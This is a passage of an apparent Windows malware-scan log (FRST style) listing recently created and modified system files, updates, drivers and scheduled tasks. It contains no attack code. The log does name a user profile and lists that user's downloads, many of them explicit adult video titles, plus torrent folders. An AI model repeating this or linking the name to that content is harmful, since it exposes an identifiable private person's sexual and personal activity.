2014-10-16 10:15 - 2014-10-16 10:15 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-16 10:05 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-16 10:05 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-10-16 10:05 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 10:05 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 10:05 - 2014-09-09 17:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-10-16 10:05 - 2014-09-09 16:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-10-16 10:05 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 10:05 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-10-16 10:05 - 2014-07-08 17:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-16 10:05 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-10-16 09:15 - 2014-10-16 09:18 - 264545614 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX096 - Gag and Tag.mp4
2014-10-16 09:09 - 2014-10-16 09:17 - 453227096 ____R () C:\Users\JoseAlcazar\Downloads\Helix - Liam Riley & Max Carter.mp4
2014-10-16 09:06 - 2014-10-16 09:06 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Jaco Van Sant, Marco Bill
2014-10-16 08:59 - 2014-10-16 09:19 - 1064197652 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9444 - Sex Scenes, Condom Free; Jack Harrer & Marc Ruffalo 20140920 (FHDQ, 23,02 min).mp4
2014-10-16 08:59 - 2014-10-16 09:06 - 926591057 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9386 - Sex Scenes, Condom Archive; Julien Hussey & Jack Harrer 20140909 (FHDQ, 17,15 min).mp4
2014-10-16 08:58 - 2014-10-16 09:14 - 949384773 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9358 - Sex Scenes, Condom Free; Billy Cotton & Rocco Alfieri 20141002 (FHDQ, 17,42 min).mp4
2014-10-14 16:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 16:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 16:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 16:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 16:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 16:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 16:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 16:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 16:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 16:52 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 16:52 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 16:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 16:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 16:52 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-14 16:52 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 16:52 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 16:52 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 16:52 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 16:52 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-14 16:52 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-14 16:52 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-14 16:52 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 16:52 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 16:52 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-14 16:52 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 16:52 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-14 16:52 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 16:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 16:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 16:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 16:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 16:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 16:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 16:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-14 16:52 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 16:52 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 16:52 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 16:52 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 16:52 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 16:52 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 16:52 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 16:52 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 16:52 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 16:52 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 16:52 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 16:52 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 16:52 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 16:52 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 16:52 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 16:52 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 16:52 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 16:52 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 16:52 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 16:52 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 16:38 - 2014-10-14 16:40 - 311888027 ____R () C:\Users\JoseAlcazar\Downloads\Helix - Tyler Hill & Lukas Grande.mp4
2014-10-14 16:36 - 2014-10-14 16:38 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Marcel Gassion, Jack Harrer, Paul Valery
2014-10-12 16:52 - 2014-10-12 16:58 - 449983828 _____ () C:\Users\JoseAlcazar\Downloads\Helix - Jacob Dixon & Davey Brooks.mp4
2014-10-11 10:36 - 2014-10-11 10:39 - 326580168 _____ () C:\Users\JoseAlcazar\Downloads\BSB-DamienKyle-SalemPierce.mp4
2014-10-11 10:32 - 2014-10-11 10:40 - 405104785 _____ () C:\Users\JoseAlcazar\Downloads\[Dallas Reeves] Johnny Forza Barebacks Dylan Drive.mp4
2014-10-11 10:32 - 2014-10-11 10:36 - 437081403 _____ () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX085 - Don't Fight It.mp4
2014-10-11 10:31 - 2014-10-12 16:55 - 442999272 _____ () C:\Users\JoseAlcazar\Downloads\BSB-RonanKennedy-BrodyLasko.mp4
2014-10-11 10:29 - 2014-10-12 16:59 - 537899086 _____ () C:\Users\JoseAlcazar\Downloads\William Higgins - Marek Prohodil and Paul Belonek - Screen Test RAW - FULL CONTACT (720p).mp4
2014-10-09 15:36 - 2014-10-09 15:42 - 551483330 _____ () C:\Users\JoseAlcazar\Downloads\[Helix-8Teenboy] Braxton Klein & Michael Lee (720p).mp4
2014-10-09 15:35 - 2014-10-09 15:45 - 375474733 _____ () C:\Users\JoseAlcazar\Downloads\Sweet And Raw - Zac Todd and Boris Orla.mp4
2014-10-09 15:33 - 2014-10-09 15:38 - 551669606 _____ () C:\Users\JoseAlcazar\Downloads\Helix - Tyler Takes Two.mp4
2014-10-09 15:30 - 2014-10-13 18:12 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Billy Cotton, Florian Nemec
2014-10-09 15:29 - 2014-10-09 15:31 - 386392477 _____ () C:\Users\JoseAlcazar\Downloads\[Sebastianstudios] Dumping Loads 2 scene 1.mp4
2014-10-08 09:56 - 2014-10-08 10:00 - 450787617 _____ () C:\Users\JoseAlcazar\Downloads\[Staxus-Dirty bleepers] Dick Casey, Kamyk Walker & Neo Matthews (BB) (DP) 720p.mp4
2014-10-08 09:50 - 2014-10-08 10:10 - 823568304 _____ () C:\Users\JoseAlcazar\Downloads\MEN - Daddys Workplace Part 2 - Cameron Kincade and Matthew Ryer (720p).mp4
2014-10-07 16:38 - 2014-10-07 16:45 - 742067555 _____ () C:\Users\JoseAlcazar\Downloads\Boy Crush - Don't Cum in the Pool, Guys.mp4
2014-10-07 16:36 - 2014-11-01 11:32 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Thor Martin
2014-10-07 16:35 - 2014-10-07 16:37 - 271902308 _____ () C:\Users\JoseAlcazar\Downloads\Colllege Dudes - Davey Anthony bleep Armando Torres (720p).mp4
2014-10-07 16:34 - 2014-10-07 16:46 - 667931454 _____ () C:\Users\JoseAlcazar\Downloads\Helix - Alex Vaara & Andy Taylor.mp4
2014-10-06 17:52 - 2014-10-06 17:55 - 452618195 _____ () C:\Users\JoseAlcazar\Downloads\[D] [CaStJo] Brad Fitt & Felix Webster (BB) (2012).mp4
2014-10-06 17:41 - 2014-10-06 17:49 - 794302179 _____ () C:\Users\JoseAlcazar\Downloads\[D] [Staxus] [SauVage] - Ariel Varga & Dexter Bure & (720p).mp4
2014-10-06 17:36 - 2014-10-06 17:41 - 208881351 _____ () C:\Users\JoseAlcazar\Downloads\CollegeDudes247 - Aaron James bleep Thor Martin.wmv
2014-10-06 17:34 - 2014-10-06 17:49 - 1455403661 _____ () C:\Users\JoseAlcazar\Downloads\Tasty Tayte [Jake Jaxson - CockBoys].wmv
2014-10-06 17:30 - 2014-10-06 17:34 - 427629180 _____ () C:\Users\JoseAlcazar\Downloads\Hard Brit Lads - Jordan Fox & Kamyk Walker.mp4
2014-10-06 17:29 - 2014-10-06 17:32 - 302279424 _____ () C:\Users\JoseAlcazar\Downloads\GayHoopla - Edge of Desire Part 2.mp4

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-05 10:36 - 2013-04-17 19:04 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-05 10:36 - 2013-04-17 19:04 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-05 10:36 - 2013-01-27 10:39 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-05 10:36 - 2012-09-26 13:06 - 01136660 _____ () C:\Windows\WindowsUpdate.log
2014-11-05 10:33 - 2012-09-26 13:39 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks
2014-11-05 10:33 - 2012-09-26 13:39 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks
2014-11-05 10:33 - 2012-09-26 13:27 - 00000000 ____D () C:\Program Files (x86)\Dell DataSafe Local Backup
2014-11-05 10:33 - 2012-09-26 13:04 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-11-05 10:33 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-05 10:33 - 2009-07-13 23:51 - 00079316 _____ () C:\Windows\setupact.log
2014-11-04 18:29 - 2012-09-30 15:09 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\uTorrent
2014-11-04 18:12 - 2012-09-30 16:25 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\vlc
2014-11-04 18:10 - 2012-10-04 19:23 - 00000000 ____D () C:\Users\JoseAlcazar\~watched
2014-11-04 18:07 - 2012-10-18 15:54 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\torrents
2014-11-04 17:17 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 17:17 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 17:15 - 2009-07-14 00:13 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-03 18:54 - 2014-04-01 17:45 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\~IN PROGRESS
2014-11-03 18:05 - 2012-10-01 16:55 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\CrashDumps
2014-11-01 11:37 - 2014-01-10 18:09 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Dustin Revees
2014-11-01 11:11 - 2013-12-27 15:55 - 00000000 ____D () C:\ProgramData\Norton
2014-10-30 15:30 - 2010-11-20 22:47 - 00330776 _____ () C:\Windows\PFRO.log
2014-10-28 19:42 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-28 18:17 - 2013-01-14 21:53 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-28 06:34 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-25 18:23 - 2012-09-26 13:24 - 00000000 ____D () C:\Program Files (x86)\Dell Wireless
2014-10-25 18:21 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-25 18:20 - 2012-12-27 19:26 - 00246804 _____ () C:\Windows\system32\Drivers\AtherosBt.bin
2014-10-25 18:20 - 2012-12-27 19:26 - 00001926 _____ () C:\Windows\system32\Drivers\ramps_0x31010000_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001796 _____ () C:\Windows\system32\Drivers\ramps_0x11020000_40_cs02.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001796 _____ () C:\Windows\system32\Drivers\ramps_0x11020000_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001768 _____ () C:\Windows\system32\Drivers\ramps_0x11020000_40_cs01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001516 _____ () C:\Windows\system32\Drivers\ramps_0x31010000_40_dc01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001242 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001228 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x04.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001214 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x03.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001204 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x02.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001204 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001198 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_26.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001192 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_26_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000296 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000278 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x04.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x03.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x02.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_26_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_26.dfu
2014-10-25 18:19 - 2012-09-26 13:24 - 00000000 ____D () C:\Windows\system32\nn-NO
2014-10-25 18:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-25 18:18 - 2012-09-26 13:23 - 00000000 ____D () C:\ProgramData\Dell
2014-10-25 18:13 - 2012-09-26 13:27 - 00000000 ____D () C:\Temp
2014-10-25 18:07 - 2012-09-26 13:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-10-25 13:21 - 2014-07-02 18:51 - 00007611 _____ () C:\Users\JoseAlcazar\AppData\Local\Resmon.ResmonCfg
2014-10-25 12:35 - 2012-11-05 20:39 - 00000000 ____D () C:\Users\Guest\Documents\Bluetooth Folder
2014-10-25 12:35 - 2012-09-30 14:33 - 00000000 ____D () C:\Users\JoseAlcazar\Documents\Bluetooth Folder
2014-10-24 16:02 - 2014-08-24 14:11 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\Adobe
2014-10-18 09:37 - 2012-10-07 16:37 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\QuickPar
2014-10-18 09:31 - 2013-04-17 19:04 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 09:31 - 2013-04-17 19:04 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 17:18 - 2013-10-26 14:04 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-16 17:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 10:36 - 2014-03-30 10:14 - 00002021 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-10-16 10:36 - 2012-09-26 13:37 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-10-16 10:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
